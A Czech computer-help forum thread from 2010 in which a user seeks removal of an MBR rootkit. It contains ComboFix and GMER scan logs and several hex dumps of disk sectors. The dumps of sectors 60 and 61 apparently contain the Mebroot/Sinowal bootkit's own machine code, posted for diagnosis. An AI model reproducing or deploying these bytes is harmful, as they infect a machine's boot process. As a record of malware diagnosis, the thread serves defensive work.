c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.taskbar.previews.max", 20);
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.taskbar.previews.cachetime", 20);
.
- - - - NEPLATNÉ POLOŽKY ODSTRANĚNÉ Z REGISTRU - - - -
MSConfigStartUp-DAEMON Tools Lite - c:\program files\DAEMON Tools Lite\daemon.exe
**************************************************************************
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2010-01-21 17:48
Windows 5.1.2600 Service Pack 2 NTFS
skenování skrytých procesů ...
skenování skrytých položek 'Po spuštění' ...
skenování skrytých souborů ...
sken byl úspešně dokončen
skryté soubory: 0
**************************************************************************
Stealth MBR rootkit/Mebroot/Sinowal detector 0.3.7 by Gmer, http://www.gmer.net
device: opened successfully
user: MBR read successfully
called modules: ntkrnlpa.exe CLASSPNP.SYS disk.sys >>UNKNOWN [0x8A15C3B0]<<
kernel: MBR read successfully
detected MBR rootkit hooks:
\Driver\Disk -> CLASSPNP.SYS @ 0xba90cfc3
\Driver\ACPI -> ACPI.sys @ 0xba759cb8
\Driver\atapi -> 0x8a15c3b0
IoDeviceObjectType -> DeleteProcedure -> ntkrnlpa.exe @ 0x80577d44
ParseProcedure -> ntkrnlpa.exe @ 0x80576964
\Device\Harddisk0\DR0 -> DeleteProcedure -> ntkrnlpa.exe @ 0x80577d44
ParseProcedure -> ntkrnlpa.exe @ 0x80576964
NDIS: -> SendCompleteHandler -> 0x0
PacketIndicateHandler -> 0x0
SendHandler -> 0x0
Warning: possible MBR rootkit infection !
user & kernel MBR OK
malicious code @ sector 0xdf8f900 size 0x1aa !
PE file found in sector at 0x0DF8F900 !
**************************************************************************
.
--------------------- Knihovny navázané na běžící procesy ---------------------
- - - - - - - > 'winlogon.exe'(976)
c:\windows\System32\BCMLogon.dll
- - - - - - - > 'explorer.exe'(1312)
c:\windows\system32\nview.dll
c:\windows\system32\nvwddi.dll
.
------------------------ Jiné spuštené procesy ------------------------
.
c:\windows\System32\WLTRYSVC.EXE
c:\windows\System32\bcmwltry.exe
c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
c:\program files\Bonjour\mDNSResponder.exe
c:\program files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
c:\windows\system32\rundll32.exe
c:\windows\system32\RUNDLL32.EXE
c:\windows\system32\rundll32.exe
c:\windows\stsystra.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\windows\system32\nvsvc32.exe
c:\windows\system32\wdfmgr.exe
c:\progra~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
.
**************************************************************************
.
Celkový čas: 2010-01-21 17:50:13 - počítač byl restartován
ComboFix-quarantined-files.txt 2010-01-21 16:50
ComboFix2.txt 2010-01-21 14:30
Před spuštěním: Volných bajtů: 14 273 097 728
Po spuštění: Volných bajtů: 14 239 498 240
- - End Of File - - 3E1DDCD5050AC6F445B144A4E2AB03A7
-
- Návštěvník
- Příspěvky: 43
- Registrován: 21 led 2010 10:56
Re: Angela.C prosím o pomoc!!!
ok, jasně chápu, i tak si udělal obrovskej kus práce a jsem ti neskutečně vděčnej. Ještě, že existují takový machři jako jsi ty! Opravdu ještě jednou mockrát děkuju!!! 

-
- Návštěvník
- Příspěvky: 43
- Registrován: 21 led 2010 10:56
Re: Angela.C prosím o pomoc!!!
Ahoj Naughty, tak Gmer nevalí za žádných okolností, hodí to hlášku, že se vyskytla chyba a že bude ukončen...
-
- Návštěvník
- Příspěvky: 43
- Registrován: 21 led 2010 10:56
Re: Angela.C prosím o pomoc!!!
ok, ale co mám spustit, abych dostal log mbr.txt
-
- Návštěvník
- Příspěvky: 43
- Registrován: 21 led 2010 10:56
Re: Angela.C prosím o pomoc!!!
log z mbr.txt
Stealth MBR rootkit/Mebroot/Sinowal detector 0.3.7 by Gmer, http://www.gmer.net
device: opened successfully
user: MBR read successfully
kernel: MBR read successfully
user & kernel MBR OK
malicious code @ sector 0xdf8f900 size 0x1aa !
PE file found in sector at 0x0DF8F900 !
Stealth MBR rootkit/Mebroot/Sinowal detector 0.3.7 by Gmer, http://www.gmer.net
device: opened successfully
user: MBR read successfully
kernel: MBR read successfully
user & kernel MBR OK
malicious code @ sector 0xdf8f900 size 0x1aa !
PE file found in sector at 0x0DF8F900 !
-
- Návštěvník
- Příspěvky: 43
- Registrován: 21 led 2010 10:56
Re: Angela.C prosím o pomoc!!!
log z "dosu"
Stealth MBR rootkit/Mebroot/Sinowal detector 0.3.7 by Gmer, http://www.gmer.net
device: opened successfully
user: MBR read successfully
called modules: ntkrnlpa.exe CLASSPNP.SYS disk.sys >>UNKNOWN [0x8A138328]<<
kernel: MBR read successfully
detected MBR rootkit hooks:
\Driver\atapi -> 0x8a138328
Warning: possible MBR rootkit infection !
user & kernel MBR OK
malicious code @ sector 0xdf8f900 size 0x1aa !
PE file found in sector at 0x0DF8F900 !
Use "Recovery Console" command "fixmbr" to clear infection !
Stealth MBR rootkit/Mebroot/Sinowal detector 0.3.7 by Gmer, http://www.gmer.net
device: opened successfully
user: MBR read successfully
called modules: ntkrnlpa.exe CLASSPNP.SYS disk.sys >>UNKNOWN [0x8A138328]<<
kernel: MBR read successfully
detected MBR rootkit hooks:
\Driver\atapi -> 0x8a138328
Warning: possible MBR rootkit infection !
user & kernel MBR OK
malicious code @ sector 0xdf8f900 size 0x1aa !
PE file found in sector at 0x0DF8F900 !
Use "Recovery Console" command "fixmbr" to clear infection !
-
- Návštěvník
- Příspěvky: 43
- Registrován: 21 led 2010 10:56
Re: Angela.C prosím o pomoc!!!
pokud vím tak jenom daemona a toho jsem na tvůj příkaz včera odinstaloval 
To s tím HxD je trochu problém
)) otevřu fyzickej disk, ale nevím jakej sektor mám zvolit a na jakých 65 rolovat a kde se má to Hex objevovat
)) Jsem amatér 

To s tím HxD je trochu problém



-
- Návštěvník
- Příspěvky: 43
- Registrován: 21 led 2010 10:56
Re: Angela.C prosím o pomoc!!!
znaky ze sektoru 63:
EB 52 90 4E 54 46 53 20 20 20 20 00 02 08 00 00 00 00 00 00 00 F8 00 00 3F 00 FF 00 3F 00 00 00 00 00 00 00 80 00 80 00 AE C7 45 04 00 00 00 00 00 00 0C 00 00 00 00 00 7A 5C 44 00 00 00 00 00 F6 00 00 00 01 00 00 00 0C FF AB CC 44 AC CC 74 00 00 00 00 FA 33 C0 8E D0 BC 00 7C FB B8 C0 07 8E D8 E8 16 00 B8 00 0D 8E C0 33 DB C6 06 0E 00 10 E8 53 00 68 00 0D 68 6A 02 CB 8A 16 24 00 B4 08 CD 13 73 05 B9 FF FF 8A F1 66 0F B6 C6 40 66 0F B6 D1 80 E2 3F F7 E2 86 CD C0 ED 06 41 66 0F B7 C9 66 F7 E1 66 A3 20 00 C3 B4 41 BB AA 55 8A 16 24 00 CD 13 72 0F 81 FB 55 AA 75 09 F6 C1 01 74 04 FE 06 14 00 C3 66 60 1E 06 66 A1 10 00 66 03 06 1C 00 66 3B 06 20 00 0F 82 3A 00 1E 66 6A 00 66 50 06 53 66 68 10 00 01 00 80 3E 14 00 00 0F 85 0C 00 E8 B3 FF 80 3E 14 00 00 0F 84 61 00 B4 42 8A 16 24 00 16 1F 8B F4 CD 13 66 58 5B 07 66 58 66 58 1F EB 2D 66 33 D2 66 0F B7 0E 18 00 66 F7 F1 FE C2 8A CA 66 8B D0 66 C1 EA 10 F7 36 1A 00 86 D6 8A 16 24 00 8A E8 C0 E4 06 0A CC B8 01 02 CD 13 0F 82 19 00 8C C0 05 20 00 8E C0 66 FF 06 10 00 FF 0E 0E 00 0F 85 6F FF 07 1F 66 61 C3 A0 F8 01 E8 09 00 A0 FB 01 E8 03 00 FB EB FE B4 01 8B F0 AC 3C 00 74 09 B4 0E BB 07 00 CD 10 EB F2 C3 0D 0A 43 68 79 62 61 20 9F 74 65 6E A1 20 64 69 73 6B 75 00 0D 0A 4E 54 4C 44 52 20 6E 65 6E 61 6C 65 7A 65 6E 00 0D 0A 4E 54 4C 44 52 20 6B 6F 6D 70 72 69 6D 6F 76 A0 6E 2E 00 0D 0A 52 65 73 74 61 72 74 75 6A 74 65 20 73 74 69 73 6B 6E 75 74 A1 6D 20 6B 6C A0 76 65 73 20 43 74 72 6C 2B 41 6C 74 2B 44 65 6C 2E 0D 0A 00 00 00 00 00 00 00 00 00 00 00 83 97 A9 BE 00 00 55 AA
EB 52 90 4E 54 46 53 20 20 20 20 00 02 08 00 00 00 00 00 00 00 F8 00 00 3F 00 FF 00 3F 00 00 00 00 00 00 00 80 00 80 00 AE C7 45 04 00 00 00 00 00 00 0C 00 00 00 00 00 7A 5C 44 00 00 00 00 00 F6 00 00 00 01 00 00 00 0C FF AB CC 44 AC CC 74 00 00 00 00 FA 33 C0 8E D0 BC 00 7C FB B8 C0 07 8E D8 E8 16 00 B8 00 0D 8E C0 33 DB C6 06 0E 00 10 E8 53 00 68 00 0D 68 6A 02 CB 8A 16 24 00 B4 08 CD 13 73 05 B9 FF FF 8A F1 66 0F B6 C6 40 66 0F B6 D1 80 E2 3F F7 E2 86 CD C0 ED 06 41 66 0F B7 C9 66 F7 E1 66 A3 20 00 C3 B4 41 BB AA 55 8A 16 24 00 CD 13 72 0F 81 FB 55 AA 75 09 F6 C1 01 74 04 FE 06 14 00 C3 66 60 1E 06 66 A1 10 00 66 03 06 1C 00 66 3B 06 20 00 0F 82 3A 00 1E 66 6A 00 66 50 06 53 66 68 10 00 01 00 80 3E 14 00 00 0F 85 0C 00 E8 B3 FF 80 3E 14 00 00 0F 84 61 00 B4 42 8A 16 24 00 16 1F 8B F4 CD 13 66 58 5B 07 66 58 66 58 1F EB 2D 66 33 D2 66 0F B7 0E 18 00 66 F7 F1 FE C2 8A CA 66 8B D0 66 C1 EA 10 F7 36 1A 00 86 D6 8A 16 24 00 8A E8 C0 E4 06 0A CC B8 01 02 CD 13 0F 82 19 00 8C C0 05 20 00 8E C0 66 FF 06 10 00 FF 0E 0E 00 0F 85 6F FF 07 1F 66 61 C3 A0 F8 01 E8 09 00 A0 FB 01 E8 03 00 FB EB FE B4 01 8B F0 AC 3C 00 74 09 B4 0E BB 07 00 CD 10 EB F2 C3 0D 0A 43 68 79 62 61 20 9F 74 65 6E A1 20 64 69 73 6B 75 00 0D 0A 4E 54 4C 44 52 20 6E 65 6E 61 6C 65 7A 65 6E 00 0D 0A 4E 54 4C 44 52 20 6B 6F 6D 70 72 69 6D 6F 76 A0 6E 2E 00 0D 0A 52 65 73 74 61 72 74 75 6A 74 65 20 73 74 69 73 6B 6E 75 74 A1 6D 20 6B 6C A0 76 65 73 20 43 74 72 6C 2B 41 6C 74 2B 44 65 6C 2E 0D 0A 00 00 00 00 00 00 00 00 00 00 00 83 97 A9 BE 00 00 55 AA
-
- Návštěvník
- Příspěvky: 43
- Registrován: 21 led 2010 10:56
Re: Angela.C prosím o pomoc!!!
hele no a jak jsi psal to s atapi, nemůže to mít vliv na mechaniku, docela problematicky mi to vypaluje a ještě hůř načítá dvd 

-
- Návštěvník
- Příspěvky: 43
- Registrován: 21 led 2010 10:56
Re: Angela.C prosím o pomoc!!!
sektor 10 neobsahuje samé nuly:
5F 5F 49 44 5F 5F 3D 56 41 52 32 54 52 4B 30 00 5F 5F 49 44 56 45 52 5F 5F 3D 41 30 33 00 53 4E 55 4D 3D 32 44 58 58 35 46 31 00 4D 44 53 52 53 45 52 56 45 52 53 3D 62 6E 61 65 67 31 6C 6F 67 30 39 00 55 50 58 45 5F 41 43 54 49 56 45 3D 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
sektor 57:
44 49 53 4B 01 80 FF FF FE 1E 00 01 00 FF 3F 00 00 10 00 00 00 3F 00 00 00 B0 4B F9 0D 00 00 00 00 00 02 1B 7A 00 F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
sektor 60:
8B F0 85 C0 9C 75 05 83 44 24 04 00 60 FC 8B 7C 24 24 81 E7 00 00 F0 FF B0 C7 AE 75 FD 81 3F 46 34 00 40 75 F5 B0 A1 AE 75 FD 8B 37 8B 36 8B 36 8B 5E 18 8B EB 43 81 3B 6A 4B 6A 19 75 F7 80 7B 04 89 75 03 83 C3 06 80 7B 04 E8 75 E8 8D 7B 09 B0 E8 AE 75 FD 66 81 7F 04 84 C0 75 D8 8B 17 8D 54 3A 04 E8 00 00 00 00 58 66 0D FF 01 40 89 50 04 89 68 0C 57 8B 75 3C 8B 74 35 50 03 F5 4E 81 CE FF 0F 00 00 81 EE FF 01 00 00 8B FE 96 B9 80 00 00 00 F3 A5 5F 2B C7 83 E8 04 AB 61 9D C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
sektor 61:
8B 14 24 68 78 56 34 12 8B 0C 24 68 78 56 34 12 0F 20 C0 50 25 FF FF FE FF 0F 22 C0 2B CA 58 0F 22 C0 FF 34 24 68 62 E0 07 37 E8 3B 00 00 00 59 59 68 AB 01 00 00 6A 00 FF D0 60 E8 00 00 00 00 5E 83 C6 15 8B F8 6A 6A 59 F3 A5 B1 80 8D BE 00 FE FF FF FF E0 33 C0 61 FF 74 24 0C FF 54 24 08 59 5A 60 87 CD E8 52 00 00 00 60 8B 6C 24 28 8B 45 3C 8B 54 05 78 03 D5 8B 4A 18 8B 5A 20 03 DD E3 32 49 8B 34 8B 03 F5 33 FF FC 33 C0 AC 3A C4 74 07 C1 CF 0D 03 F8 EB F2 3B 7C 24 24 75 E1 8B 5A 24 03 DD 66 8B 0C 4B 8B 5A 1C 03 DD 8B 04 8B 03 C5 EB 02 33 C0 89 44 24 1C 61 C3 5B 55 68 B8 74 29 85 FF D3 33 D2 52 52 8B F4 52 8B FC E8 26 00 00 00 5C 00 3F 00 3F 00 5C 00 50 00 68 00 79 00 73 00 69 00 63 00 61 00 6C 00 44 00 72 00 69 00 76 00 65 00 30 00 00 00 68 24 00 26 00 8B CC 52 52 6A 40 51 52 6A 18 8B CC 6A 20 6A 03 56 51 68 00 00 10 80 57 FF D0 55 68 62 E0 07 37 FF D3 97 55 68 16 D5 FC 84 FF D3 89 06 68 1B 00 00 00 68 00 00 F2 F1 8B CC 6A 00 51 B9 00 54 03 00 51 51 6A 00 FF D7 50 56 8B CE 96 33 D2 52 52 52 FF 74 24 58 FF 11 55 68 5F 4C D4 DC FF D3 FF 74 24 40 FF D0 8B 46 3C 03 C6 50 8B 50 50 52 52 6A 00 FF D7 97 59 57 32 C0 F3 AA 5F 58 60 8B 48 54 F3 A4 61 2B C6 03 C7 0F B7 48 06 8D 90 F8 00 00 00 60 03 72 14 03 7A 0C 8B 4A 10 E3 02 F3 A4 61 83 C2 28 E2 EC 50 60 8B FE 91 B9 00 D5 00 00 F3 AB 61 55 68 1F 9D 48 9D FF D3 95 56 FF D5 8B 74 24 08 FF B4 24 84 00 00 00 57 8B 46 28 03 C7 FF D0 0B C0 7D 0E 8B 4E 50 E3 09 32 C0 57 F3 AA 5F 57 FF D5 83 C4 60 33 C0 8B FB 83 EF 15 B9 9C 01 00 00 F3 AA 61 C2 04 00 00 00 00 00 00 00 00 00 00
sektor 62:
33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 1B 7C BF 1B 06 50 57 B9 E5 01 F3 A4 CB BD BE 07 B1 04 38 6E 00 7C 09 75 13 83 C5 10 E2 F4 CD 18 8B F5 83 C6 10 49 74 19 38 2C 74 F6 A0 B5 07 B4 07 8B F0 AC 3C 00 74 FC BB 07 00 B4 0E CD 10 EB F2 88 4E 10 E8 46 00 73 2A FE 46 10 80 7E 04 0B 74 0B 80 7E 04 0C 74 05 A0 B6 07 75 D2 80 46 02 06 83 46 08 06 83 56 0A 00 E8 21 00 73 05 A0 B6 07 EB BC 81 3E FE 7D 55 AA 74 0B 80 7E 10 00 74 C8 A0 B7 07 EB A9 8B FC 1E 57 8B F5 CB BF 05 00 8A 56 00 B4 08 CD 13 72 23 8A C1 24 3F 98 8A DE 8A FC 43 F7 E3 8B D1 86 D6 B1 06 D2 EE 42 F7 E2 39 56 0A 77 23 72 05 39 46 08 73 1C B8 01 02 BB 00 7C 8B 4E 02 8B 56 00 CD 13 73 51 4F 74 4E 32 E4 8A 56 00 CD 13 EB E4 8A 56 00 60 BB AA 55 B4 41 CD 13 72 36 81 FB 55 AA 75 30 F6 C1 01 74 2B 61 60 6A 00 6A 00 FF 76 0A FF 76 08 6A 00 68 00 7C 6A 01 6A 10 B4 42 8B F4 CD 13 61 61 73 0E 4F 74 0B 32 E4 8A 56 00 CD 13 EB D6 61 F9 C3 4E 65 70 6C 61 74 6E A0 20 74 61 62 75 6C 6B 61 20 6F 64 64 A1 6C 85 00 43 68 79 62 61 20 70 FD 69 20 6E 61 9F A1 74 A0 6E A1 20 6F 70 65 72 61 9F 6E A1 68 6F 20 73 79 73 74 82 6D 75 00 4F 70 65 72 61 9F 6E A1 20 73 79 73 74 82 6D 20 6E 65 6E 61 6C 65 7A 65 6E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2C 44 6A 8C 73 F4 D0 00 00 80 01 01 00 07 FE FF FF 3F 00 00 00 37 16 71 02 00 00 C1 FF 0F FE FF FF 76 16 71 02 8A E2 87 0B 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA
sektor 64:
05 00 4E 00 54 00 4C 00 44 00 52 00 04 00 24 00 49 00 33 00 30 00 00 E0 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EB 12 90 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8C C8 8E D8 C1 E0 04 FA 8B E0 FB E8 03 FE 66 0F B7 06 0B 00 66 0F B6 1E 0D 00 66 F7 E3 66 A3 4E 02 66 8B 0E 40 00 80 F9 00 0F 8F 0E 00 F6 D9 66 B8 01 00 00 00 66 D3 E0 EB 08 90 66 A1 4E 02 66 F7 E1 66 A3 52 02 66 0F B7 1E 0B 00 66 33 D2 66 F7 F3 66 A3 56 02 E8 71 04 66 8B 0E 4A 02 66 89 0E 22 02 66 03 0E 52 02 66 89 0E 26 02 66 03 0E 52 02 66 89 0E 2A 02 66 03 0E 52 02 66 89 0E 3A 02 66 03 0E 52 02 66 89 0E 42 02 66 B8 90 00 00 00 66 8B 0E 22 02 E8 5F 09 66 0B C0 0F 84 57 FE 66 A3 2E 02 66 B8 A0 00 00 00 66 8B 0E 26 02 E8 46 09 66 A3 32 02 66 B8 B0 00 00 00 66 8B 0E 2A 02 E8 34 09 66 A3 36 02 66 A1 2E 02 66 0B C0 0F 84 24 FE 67 80 78 08 00 0F 85 1B FE 67 66 8D 50 10 67 03 42 04 67 66 0F B6 48 0C 66 89 0E 62 02 67 66 8B 48 08 66 89 0E 5E 02 66 A1 5E 02 66 0F B7 0E 0B 00 66 33 D2 66 F7 F1 66 A3 66 02 66 A1 42 02 66 03 06 5E 02 66 A3 46 02 66 83 3E 32 02 00 0F 84 1D 00 66 83 3E 36 02 00 0F 84 C8 FD 66 8B 1E 36 02 1E 07 66 8B 3E 46 02 66 A1 2A 02 E8 BC 01 66 0F B7 0E 00 02 66 B8 02 02 00 00 E8 FE 07 66 0B C0 0F 84 A8 09 67 66 8B 00 1E 07 66 8B 3E 3A 02 E8 31 06 66 A1 3A 02 66 BB 20 00 00 00 66 B9 00 00 00 00 66 BA 00 00 00 00 E8 D6 00 66 85 C0 0F 85 23 00 66 A1 3A 02 66 BB 80 00 00 00 66 B9 00 00 00 00
sektor 65:
66 BA 00 00 00 00 E8 B6 00 66 0B C0 0F 85 44 00 E9 57 09 66 33 D2 66 B9 80 00 00 00 66 A1 3A 02 E8 BC 08 66 0B C0 0F 84 40 09 1E 07 66 8B 3E 3A 02 E8 CD 05 66 A1 3A 02 66 BB 80 00 00 00 66 B9 00 00 00 00 66 BA 00 00 00 00 E8 72 00 66 0B C0 0F 84 16 09 67 66 0F B7 58 0C 66 81 E3 FF 00 00 00 0F 85 0B 09 66 8B D8 68 00 20 07 66 2B FF 66 A1 3A 02 E8 F2 00 8A 16 24 00 B8 E8 03 8E C0 8D 36 0B 00 2B C0 68 00 20 50 CB 06 1E 66 60 66 8B DA 66 0F B6 0E 0D 00 66 F7 E1 66 A3 10 00 66 8B C3 66 F7 E1 A3 0E 00 8B DF 83 E3 0F 8C C0 66 C1 EF 04 03 C7 50 07 E8 0E FC 66 61 90 1F 07 C3 67 03 40 14 67 66 83 38 FF 0F 84 4C 00 67 66 39 18 0F 85 33 00 66 0B C9 0F 85 0A 00 67 80 78 09 00 0F 85 23 00 C3 67 3A 48 09 0F 85 1A 00 66 8B F0 67 03 70 0A E8 97 06 66 51 1E 07 66 8B FA F3 A7 66 59 0F 85 01 00 C3 67 66 83 78 04 00 0F 84 07 00 67 66 03 40 04 EB AB 66 2B C0 C3 66 8B F3 E8 6C 06 67 66 03 00 67 F7 40 0C 02 00 0F 85 34 00 67 66 8D 50 10 67 3A 4A 40 0F 85 18 00 67 66 8D 72 42 E8 49 06 66 51 1E 07 66 8B FB F3 A7 66 59 0F 85 01 00 C3 67 83 78 08 00 0F 84 06 00 67 03 40 08 EB C2 66 33 C0 C3 67 80 7B 08 00 0F 85 1C 00 06 1E 66 60 67 66 8D 53 10 67 66 8B 0A 66 8B F3 67 03 72 04 F3 A4 66 61 90 1F 07 C3 66 50 67 66 8D 53 10 66 85 C0 0F 85 0A 00 67 66 8B 4A 08 66 41 EB 11 90 67 66 8B 42 18 66 33 D2 66 F7 36 4E 02 66 8B C8 66 2B C0 66 5E E8 01 00 C3 06 1E 66 60 67 80 7B 08 01 0F 84 03 00 E9 93 FB 66 83 F9 00 0F 85 06 00 66 61 90 1F 07 C3 66 53 66 50 66 51 66 56 66 57 06 E8 91 04 66 8B D1 07 66 5F 66 5E 66 59 66 85 C0 0F 84 34 00 66 3B CA 0F 8D
5F 5F 49 44 5F 5F 3D 56 41 52 32 54 52 4B 30 00 5F 5F 49 44 56 45 52 5F 5F 3D 41 30 33 00 53 4E 55 4D 3D 32 44 58 58 35 46 31 00 4D 44 53 52 53 45 52 56 45 52 53 3D 62 6E 61 65 67 31 6C 6F 67 30 39 00 55 50 58 45 5F 41 43 54 49 56 45 3D 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
sektor 57:
